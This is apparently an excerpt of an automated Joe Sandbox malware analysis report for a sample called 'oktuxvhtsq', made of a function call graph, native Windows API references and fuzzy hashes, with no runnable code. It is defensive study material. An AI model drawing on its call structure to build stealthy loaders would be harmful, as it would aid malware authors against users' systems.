82176->82175 82205 41b270 82176->82205 82178 409ce3 82178->82175 82216 409aa0 82178->82216 82180 409d03 82223 409620 LdrLoadDll 82180->82223 82182 409d15 82182->82125 82184 409c3a 82183->82184 82185 41b560 LdrLoadDll 82183->82185 82572 41b560 82184->82572 82185->82184 82188 41b560 LdrLoadDll 82189 409c61 82188->82189 82190 40f170 82189->82190 82191 40f189 82190->82191 82580 40b030 82191->82580 82193 40f19c 82584 41a1a0 82193->82584 82196 409d55 82196->82119 82198 40f1c2 82199 40f1ed 82198->82199 82590 41a220 82198->82590 82201 41a450 2 
API calls 82199->82201 82201->82196 82224 41a5c0 82202->82224 82206 41b289 82205->82206 82237 414a40 82206->82237 82208 41b2a1 82209 41b2aa 82208->82209 82276 41b0b0 82208->82276 82209->82178 82211 41b2be 82211->82209 82294 419ec0 82211->82294 82550 407ea0 82216->82550 82218 409ac1 82218->82180 82219 409aba 82219->82218 82563 408160 82219->82563 82222->82172 82223->82182 82227 41af20 82224->82227 82226 418a45 82226->82176 82228 41af30 82227->82228 82230 41af52 82227->82230 82231 414e40 82228->82231 82230->82226 82232 414e4e 82231->82232 82233 414e5a 82231->82233 82232->82233 82236 4152c0 LdrLoadDll 82232->82236 82233->82230 82235 414fac 82235->82230 82236->82235 82238 414d75 82237->82238 82248 414a54 82237->82248 82238->82208 82241 414b80 82305 41a320 82241->82305 82242 414b63 82362 41a420 LdrLoadDll 82242->82362 82245 414b6d 82245->82208 82246 414ba7 82247 41bd80 2 API calls 82246->82247 82251 414bb3 82247->82251 82248->82238 82302 419c10 82248->82302 82249 414d39 82250 41a450 2 API calls 82249->82250 82253 414d40 82250->82253 82251->82245 82251->82249 82252 414d4f 82251->82252 82256 414c42 82251->82256 82371 414780 LdrLoadDll NtReadFile NtClose 82252->82371 82253->82208 82255 414d62 82255->82208 82257 414ca9 82256->82257 82259 414c51 82256->82259 82257->82249 82258 414cbc 82257->82258 82364 41a2a0 82258->82364 82261 414c56 82259->82261 82262 414c6a 82259->82262 82363 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82261->82363 82263 414c87 82262->82263 82264 414c6f 82262->82264 82263->82253 82320 414400 82263->82320 82308 4146e0 82264->82308 82269 414c60 82269->82208 82270 414c7d 82270->82208 82272 414d1c 82368 41a450 82272->82368 82273 414c9f 82273->82208 82275 414d28 82275->82208 82278 41b0c1 82276->82278 82277 41b0d3 82277->82211 82278->82277 82389 41bd00 82278->82389 82280 41b0f4 82392 414060 82280->82392 82282 41b140 82282->82211 82283 41b117 82283->82282 82284 414060 3 API calls 82283->82284 82287 41b139 82284->82287 82286 41b1ca 82288 
41b1da 82286->82288 82518 41aec0 LdrLoadDll 82286->82518 82287->82282 82424 415380 82287->82424 82434 41ad30 82288->82434 82291 41b208 82513 419e80 82291->82513 82295 41af20 LdrLoadDll 82294->82295 82296 419edc 82295->82296 82546 72fae8 LdrInitializeThunk 82296->82546 82297 419ef7 82299 41bd80 82297->82299 82547 41a630 82299->82547 82301 41b319 82301->82178 82303 41af20 LdrLoadDll 82302->82303 82304 414b34 82302->82304 82303->82304 82304->82241 82304->82242 82304->82245 82306 41af20 LdrLoadDll 82305->82306 82307 41a33c NtCreateFile 82306->82307 82307->82246 82309 4146fc 82308->82309 82310 41a2a0 LdrLoadDll 82309->82310 82311 41471d 82310->82311 82312 414724 82311->82312 82313 414738 82311->82313 82314 41a450 2 API calls 82312->82314 82315 41a450 2 API calls 82313->82315 82317 41472d 82314->82317 82316 414741 82315->82316 82372 41bf90 LdrLoadDll RtlAllocateHeap 82316->82372 82317->82270 82319 41474c 82319->82270 82321 41444b 82320->82321 82322 41447e 82320->82322 82323 41a2a0 LdrLoadDll 82321->82323 82324 4145c9 82322->82324 82328 41449a 82322->82328 82326 414466 82323->82326 82325 41a2a0 LdrLoadDll 82324->82325 82334 4145e4 82325->82334 82327 41a450 2 API calls 82326->82327 82329 41446f 82327->82329 82330 41a2a0 LdrLoadDll 82328->82330 82329->82273 82331 4144b5 82330->82331 82332 4144d1 82331->82332 82333 4144bc 82331->82333 82338 4144d6 82332->82338 82339 4144ec 82332->82339 82337 41a450 2 API calls 82333->82337 82385 41a2e0 LdrLoadDll 82334->82385 82336 41461e 82340 41a450 2 API calls 82336->82340 82341 4144c5 82337->82341 82342 41a450 2 API calls 82338->82342 82348 4144f1 82339->82348 82373 41bf50 82339->82373 82343 414629 82340->82343 82341->82273 82344 4144df 82342->82344 82343->82273 82344->82273 82347 414557 82349 41456e 82347->82349 82384 41a260 LdrLoadDll 82347->82384 82355 414503 82348->82355 82376 41a3d0 82348->82376 82351 414575 82349->82351 82352 41458a 82349->82352 82353 41a450 2 API calls 82351->82353 82354 41a450 2 API calls 82352->82354 
82353->82355 82356 414593 82354->82356 82355->82273 82357 4145bf 82356->82357 82379 41bb50 82356->82379 82357->82273 82359 4145aa 82360 41bd80 2 API calls 82359->82360 82361 4145b3 82360->82361 82361->82273 82362->82245 82363->82269 82365 414d04 82364->82365 82366 41af20 LdrLoadDll 82364->82366 82367 41a2e0 LdrLoadDll 82365->82367 82366->82365 82367->82272 82369 41a46c NtClose 82368->82369 82370 41af20 LdrLoadDll 82368->82370 82369->82275 82370->82369 82371->82255 82372->82319 82375 41bf68 82373->82375 82386 41a5f0 82373->82386 82375->82348 82377 41a3ec NtReadFile 82376->82377 82378 41af20 LdrLoadDll 82376->82378 82377->82347 82378->82377 82380 41bb74 82379->82380 82381 41bb5d 82379->82381 82380->82359 82381->82380 82382 41bf50 2 API calls 82381->82382 82383 41bb8b 82382->82383 82383->82359 82384->82349 82385->82336 82387 41af20 LdrLoadDll 82386->82387 82388 41a60c RtlAllocateHeap 82387->82388 82388->82375 82390 41bd2d 82389->82390 82519 41a500 82389->82519 82390->82280 82393 414071 82392->82393 82394 414079 82392->82394 82393->82283 82423 41434c 82394->82423 82522 41cef0 82394->82522 82396 4140cd 82397 41cef0 2 API calls 82396->82397 82401 4140d8 82397->82401 82398 414126 82400 41cef0 2 API calls 82398->82400 82404 41413a 82400->82404 82401->82398 82402 41d020 3 API calls 82401->82402 82533 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 82401->82533 82402->82401 82403 414197 82405 41cef0 2 API calls 82403->82405 82404->82403 82527 41d020 82404->82527 82406 4141ad 82405->82406 82408 4141ea 82406->82408 82410 41d020 3 API calls 82406->82410 82409 41cef0 2 API calls 82408->82409 82411 4141f5 82409->82411 82410->82406 82412 41d020 3 API calls 82411->82412 82414 41422f 82411->82414 82412->82411 82534 41cf50 LdrLoadDll RtlFreeHeap 82414->82534 82415 414324 82535 41cf50 LdrLoadDll RtlFreeHeap 82415->82535 82417 41432e 82536 41cf50 LdrLoadDll RtlFreeHeap 82417->82536 82419 414338 82537 41cf50 LdrLoadDll RtlFreeHeap 82419->82537 82421 414342 82538 41cf50 LdrLoadDll 
RtlFreeHeap 82421->82538 82423->82283 82425 415391 82424->82425 82426 414a40 8 API calls 82425->82426 82428 4153a7 82426->82428 82427 4153fa 82427->82286 82428->82427 82429 4153e2 82428->82429 82430 4153f5 82428->82430 82432 41bd80 2 API calls 82429->82432 82431 41bd80 2 API calls 82430->82431 82431->82427 82433 4153e7 82432->82433 82433->82286 82539 41abf0 82434->82539 82437 41abf0 LdrLoadDll 82438 41ad4d 82437->82438 82439 41abf0 LdrLoadDll 82438->82439 82440 41ad56 82439->82440 82441 41abf0 LdrLoadDll 82440->82441 82442 41ad5f 82441->82442 82443 41abf0 LdrLoadDll 82442->82443 82444 41ad68 82443->82444 82445 41abf0 LdrLoadDll 82444->82445 82446 41ad71 82445->82446 82447 41abf0 LdrLoadDll 82446->82447 82448 41ad7d 82447->82448 82449 41abf0 LdrLoadDll 82448->82449 82450 41ad86 82449->82450 82451 41abf0 LdrLoadDll 82450->82451 82452 41ad8f 82451->82452 82453 41abf0 LdrLoadDll 82452->82453 82454 41ad98 82453->82454 82455 41abf0 LdrLoadDll 82454->82455 82456 41ada1 82455->82456 82457 41abf0 LdrLoadDll 82456->82457 82458 41adaa 82457->82458 82459 41abf0 LdrLoadDll 82458->82459 82460 41adb6 82459->82460 82461 41abf0 LdrLoadDll 82460->82461 82462 41adbf 82461->82462 82463 41abf0 LdrLoadDll 82462->82463 82464 41adc8 82463->82464 82465 41abf0 LdrLoadDll 82464->82465 82466 41add1 82465->82466 82467 41abf0 LdrLoadDll 82466->82467 82468 41adda 82467->82468 82469 41abf0 LdrLoadDll 82468->82469 82470 41ade3 82469->82470 82471 41abf0 LdrLoadDll 82470->82471 82472 41adef 82471->82472 82473 41abf0 LdrLoadDll 82472->82473 82474 41adf8 82473->82474 82475 41abf0 LdrLoadDll 82474->82475 82476 41ae01 82475->82476 82477 41abf0 LdrLoadDll 82476->82477 82478 41ae0a 82477->82478 82479 41abf0 LdrLoadDll 82478->82479 82480 41ae13 82479->82480 82481 41abf0 LdrLoadDll 82480->82481 82482 41ae1c 82481->82482 82483 41abf0 LdrLoadDll 82482->82483 82484 41ae28 82483->82484 82485 41abf0 LdrLoadDll 82484->82485 82486 41ae31 82485->82486 82487 41abf0 LdrLoadDll 82486->82487 82488 41ae3a 82487->82488 
82489 41abf0 LdrLoadDll 82488->82489 82490 41ae43 82489->82490 82491 41abf0 LdrLoadDll 82490->82491 82492 41ae4c 82491->82492 82493 41abf0 LdrLoadDll 82492->82493 82494 41ae55 82493->82494 82495 41abf0 LdrLoadDll 82494->82495 82496 41ae61 82495->82496 82497 41abf0 LdrLoadDll 82496->82497 82498 41ae6a 82497->82498 82499 41abf0 LdrLoadDll 82498->82499 82500 41ae73 82499->82500 82501 41abf0 LdrLoadDll 82500->82501 82502 41ae7c 82501->82502 82503 41abf0 LdrLoadDll 82502->82503 82504 41ae85 82503->82504 82505 41abf0 LdrLoadDll 82504->82505 82506 41ae8e 82505->82506 82507 41abf0 LdrLoadDll 82506->82507 82508 41ae9a 82507->82508 82509 41abf0 LdrLoadDll 82508->82509 82510 41aea3 82509->82510 82511 41abf0 LdrLoadDll 82510->82511 82512 41aeac 82511->82512 82512->82291 82514 41af20 LdrLoadDll 82513->82514 82515 419e9c 82514->82515 82545 72fdc0 LdrInitializeThunk 82515->82545 82516 419eb3 82516->82211 82518->82288 82520 41af20 LdrLoadDll 82519->82520 82521 41a51c NtAllocateVirtualMemory 82520->82521 82521->82390 82523 41cf00 82522->82523 82524 41cf06 82522->82524 82523->82396 82525 41bf50 2 API calls 82524->82525 82526 41cf2c 82525->82526 82526->82396 82528 41cf90 82527->82528 82529 41cfed 82528->82529 82530 41bf50 2 API calls 82528->82530 82529->82404 82531 41cfca 82530->82531 82532 41bd80 2 API calls 82531->82532 82532->82529 82533->82401 82534->82415 82535->82417 82536->82419 82537->82421 82538->82423 82540 41ac0b 82539->82540 82541 414e40 LdrLoadDll 82540->82541 82542 41ac2b 82541->82542 82543 414e40 LdrLoadDll 82542->82543 82544 41acd7 82542->82544 82543->82544 82544->82437 82545->82516 82546->82297 82548 41a64c RtlFreeHeap 82547->82548 82549 41af20 LdrLoadDll 82547->82549 82548->82301 82549->82548 82551 407eb0 82550->82551 82552 407eab 82550->82552 82553 41bd00 2 API calls 82551->82553 82552->82219 82559 407ed5 82553->82559 82554 407f38 82554->82219 82555 419e80 2 API calls 82555->82559 82556 407f3e 82558 407f64 82556->82558 82560 41a580 2 API calls 82556->82560 
82558->82219 82559->82554 82559->82555 82559->82556 82561 41bd00 2 API calls 82559->82561 82566 41a580 82559->82566 82562 407f55 82560->82562 82561->82559 82562->82219 82564 40817e 82563->82564 82565 41a580 2 API calls 82563->82565 82564->82180 82565->82564 82567 41af20 LdrLoadDll 82566->82567 82568 41a59c 82567->82568 82571 72fb68 LdrInitializeThunk 82568->82571 82569 41a5b3 82569->82559 82571->82569 82573 41b583 82572->82573 82576 40ace0 82573->82576 82577 40ad04 82576->82577 82578 40ad40 LdrLoadDll 82577->82578 82579 409c4b 82577->82579 82578->82579 82579->82188 82582 40b053 82580->82582 82581 40b0d0 82581->82193 82582->82581 82595 419c50 LdrLoadDll 82582->82595 82585 41af20 LdrLoadDll 82584->82585 82586 40f1ab 82585->82586 82586->82196 82587 41a790 82586->82587 82588 41a7af LookupPrivilegeValueW 82587->82588 82589 41af20 LdrLoadDll 82587->82589 82588->82198 82589->82588 82591 41af20 LdrLoadDll 82590->82591 82592 41a23c 82591->82592 82596 72fed0 LdrInitializeThunk 82592->82596 82593 41a25b 82593->82199 82595->82581 82596->82593 82598 40b1e0 82597->82598 82599 40b030 LdrLoadDll 82598->82599 82600 40b1f4 82599->82600 82600->82135 82602 40ae41 82601->82602 82603 40ae3d 82601->82603 82604 40ae5a 82602->82604 82605 40ae8c 82602->82605 82603->82137 82647 419c90 LdrLoadDll 82604->82647 82648 419c90 LdrLoadDll 82605->82648 82607 40ae9d 82607->82137 82609 40ae7c 82609->82137 82611 40f490 3 API calls 82610->82611 82612 4143b6 82610->82612 82611->82612 82612->82139 82614 408a79 82613->82614 82649 4087a0 82613->82649 82616 4087a0 19 API calls 82614->82616 82619 408a9d 82614->82619 82617 408a8a 82616->82617 82617->82619 82667 40f700 10 API calls 82617->82667 82619->82141 82621 41af20 LdrLoadDll 82620->82621 82622 41a4dc 82621->82622 82786 72fea0 LdrInitializeThunk 82622->82786 82623 40c312 82625 40f490 82623->82625 82626 40f4ad 82625->82626 82787 419f80 82626->82787 82629 40f4f5 82629->82145 82630 419fd0 2 API calls 82631 40f51e 82630->82631 82631->82145 82633 41af20 
LdrLoadDll 82632->82633 82634 419fec 82633->82634 82793 72fc60 LdrInitializeThunk 82634->82793 82635 40c375 82635->82151 82635->82154 82638 41af20 LdrLoadDll 82637->82638 82639 41a03c 82638->82639 82794 72fc90 LdrInitializeThunk 82639->82794 82640 40c449 82640->82162 82643 41af20 LdrLoadDll 82642->82643 82644 419dfc 82643->82644 82795 730078 LdrInitializeThunk 82644->82795 82645 40c49c 82645->82166 82647->82609 82648->82607 82650 407ea0 4 API calls 82649->82650 82652 4087ba 82649->82652 82650->82652 82651 408a49 82651->82614 82652->82651 82653 408a3f 82652->82653 82657 419ec0 2 API calls 82652->82657 82659 41a450 LdrLoadDll NtClose 82652->82659 82662 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 82652->82662 82665 419de0 2 API calls 82652->82665 82668 419cd0 82652->82668 82671 4085d0 82652->82671 82683 40f5e0 LdrLoadDll NtClose 82652->82683 82684 419d50 LdrLoadDll 82652->82684 82685 419d80 LdrLoadDll 82652->82685 82686 419e10 LdrLoadDll 82652->82686 82687 4083a0 82652->82687 82703 405f60 LdrLoadDll 82652->82703 82654 408160 2 API calls 82653->82654 82654->82651 82657->82652 82659->82652 82662->82652 82665->82652 82667->82619 82669 419cec 82668->82669 82670 41af20 LdrLoadDll 82668->82670 82669->82652 82670->82669 82672 4085e6 82671->82672 82704 419840 82672->82704 82674 4085ff 82679 408771 82674->82679 82725 4081a0 82674->82725 82676 4086e5 82677 4083a0 11 API calls 82676->82677 82676->82679 82678 408713 82677->82678 82678->82679 82680 419ec0 2 API calls 82678->82680 82679->82652 82681 408748 82680->82681 82681->82679 82682 41a4c0 2 API calls 82681->82682 82682->82679 82683->82652 82684->82652 82685->82652 82686->82652 82688 4083c9 82687->82688 82765 408310 82688->82765 82691 41a4c0 2 API calls 82692 4083dc 82691->82692 82692->82691 82693 408467 82692->82693 82695 408462 82692->82695 82773 40f660 82692->82773 82693->82652 82694 41a450 2 API calls 82696 40849a 82694->82696 82695->82694 82696->82693 82697 419cd0 LdrLoadDll 
82696->82697 82698 4084ff 82697->82698 82698->82693 82777 419d10 82698->82777 82700 408563 82700->82693 82701 414a40 8 API calls 82700->82701 82702 4085b8 82701->82702 82702->82652 82703->82652 82705 41bf50 2 API calls 82704->82705 82706 419857 82705->82706 82732 409310 82706->82732 82708 419872 82709 4198b0 82708->82709 82710 419899 82708->82710 82713 41bd00 2 API calls 82709->82713 82711 41bd80 2 API calls 82710->82711 82712 4198a6 82711->82712 82712->82674 82714 4198ea 82713->82714 82715 41bd00 2 API calls 82714->82715 82716 419903 82715->82716 82722 419ba4 82716->82722 82738 41bd40 82716->82738 82719 419b90 82720 41bd80 2 API calls 82719->82720 82721 419b9a 82720->82721 82721->82674 82723 41bd80 2 API calls 82722->82723 82724 419bf9 82723->82724 82724->82674 82726 40829f 82725->82726 82727 4081b5 82725->82727 82726->82676 82727->82726 82728 414a40 8 API calls 82727->82728 82729 408222 82728->82729 82730 41bd80 2 API calls 82729->82730 82731 408249 82729->82731 82730->82731 82731->82676 82733 409335 82732->82733 82734 40ace0 LdrLoadDll 82733->82734 82735 409368 82734->82735 82737 40938d 82735->82737 82741 40cf10 82735->82741 82737->82708 82759 41a540 82738->82759 82742 40cf3c 82741->82742 82743 41a1a0 LdrLoadDll 82742->82743 82744 40cf55 82743->82744 82745 40cf5c 82744->82745 82752 41a1e0 82744->82752 82745->82737 82749 40cf97 82750 41a450 2 API calls 82749->82750 82751 40cfba 82750->82751 82751->82737 82753 41af20 LdrLoadDll 82752->82753 82754 41a1fc 82753->82754 82758 72fbb8 LdrInitializeThunk 82754->82758 82755 40cf7f 82755->82745 82757 41a7d0 LdrLoadDll 82755->82757 82757->82749 82758->82755 82760 41af20 LdrLoadDll 82759->82760 82761 41a55c 82760->82761 82764 730048 LdrInitializeThunk 82761->82764 82762 419b89 82762->82719 82762->82722 82764->82762 82766 408328 82765->82766 82767 40ace0 LdrLoadDll 82766->82767 82768 408343 82767->82768 82769 414e40 LdrLoadDll 82768->82769 82770 408353 82769->82770 82771 40835c PostThreadMessageW 82770->82771 82772 408370 
82770->82772 82771->82772 82772->82692 82774 40f673 82773->82774 82780 419e50 82774->82780 82778 41af20 LdrLoadDll 82777->82778 82779 419d2c 82778->82779 82779->82700 82781 41af20 LdrLoadDll 82780->82781 82782 419e6c 82781->82782 82785 72fd8c LdrInitializeThunk 82782->82785 82783 40f69e 82783->82692 82785->82783 82786->82623 82788 419f9c 82787->82788 82789 41af20 LdrLoadDll 82787->82789 82792 72ffb4 LdrInitializeThunk 82788->82792 82789->82788 82790 40f4ee 82790->82629 82790->82630 82792->82790 82793->82635 82794->82640 82795->82645 82796 72f900 LdrInitializeThunk

                                  Control-flow Graph

                                  APIs
                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !JA$bMA$bMA
                                  • API String ID: 2738559852-4222312340
                                  • Opcode ID: 33dcf55a6d7cffd85285e2efbc1188158a9fa2e30f4957344ab0f5a6bd6b24e2
                                  • Instruction ID: 7af921839762fc8d234943a10333014a8d3361fab9fd09aed87850b0a117b89a
                                  • Opcode Fuzzy Hash: 33dcf55a6d7cffd85285e2efbc1188158a9fa2e30f4957344ab0f5a6bd6b24e2
                                  • Instruction Fuzzy Hash: 82014CB2200214AFCB14DF99DC85EEB77ADEF8C718F058659BA1D97241C630E911CBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 8 41a3d0-41a3e6 9 41a3ec-41a419 NtReadFile 8->9 10 41a3e7 call 41af20 8->10 10->9
                                  APIs
                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !JA$bMA$bMA
                                  • API String ID: 2738559852-4222312340
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 239 40ace0-40acfc 240 40ad04-40ad09 239->240 241 40acff call 41cc10 239->241 242 40ad0b-40ad0e 240->242 243 40ad0f-40ad1d call 41d030 240->243 241->240 246 40ad2d-40ad30 243->246 247 40ad1f-40ad2a call 41d2b0 243->247 249 40ad36-40ad3e 246->249 250 40ad31 call 41b460 246->250 247->246 252 40ad40-40ad54 LdrLoadDll 249->252 253 40ad57-40ad5a 249->253 250->249 252->253
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 254 41a320-41a371 call 41af20 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 273 41a500-41a53d call 41af20 NtAllocateVirtualMemory
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 568dc3e59f7221dbbbdb43f9baaca06f5701ba7f862418ba9aa500066b6c7a49
                                  • Instruction ID: bcccc9545e37b7909c3383d76274991b344d2402d374e448eeb040248771b24d
                                  • Opcode Fuzzy Hash: 568dc3e59f7221dbbbdb43f9baaca06f5701ba7f862418ba9aa500066b6c7a49
                                  • Instruction Fuzzy Hash: 60D02BAE0092C04FCB10EAB474C10C27F40DD5032C3251D8FE4A40B703C138D616A3A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                  • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                  • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                  • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmp
                                   • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
